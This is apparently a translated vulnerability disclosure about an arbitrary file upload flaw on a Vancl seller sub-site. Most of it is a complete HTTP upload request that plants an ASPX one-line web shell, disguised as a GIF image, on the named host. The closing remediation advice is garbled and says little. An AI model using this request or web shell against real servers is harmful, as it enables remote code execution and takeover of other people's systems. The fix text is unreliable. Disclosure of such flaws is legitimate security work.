Arbitrary File Upload from a sub-station of fanke
Details: substation address:
Http://seller.vancl.com/account/UserAccountview
Account Authentication
Upload, capture, and change the package... Yes ..
POST/account/UploadIdImage HTTP/1.1
Host: seller.vancl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-cn, zh; q = 0.5
Connection: keep-alive
Referer: http://seller.vancl.com/account/UserAccountview
Cookie: add it by yourself
Content-Type: multipart/form-data; boundary = --------------------------- 146043902153
Content-Length: 367
----------------------------- 146043902153
Content-Disposition: form-data; name = "ufile"; filename = "xxx. aspx"
Content-Type: image/gif
GIF89a
<% @ Page Language = "Jscript" %> <% eval (Request. Item ["chopper"], "unsafe"); %>
----------------------------- 146043902153
Content-Disposition: form-data; name = "SubmitID"
......
--------------------------- 146043902153 --
Solution:
You can also deploy the service and separate it.
The file should be synchronized.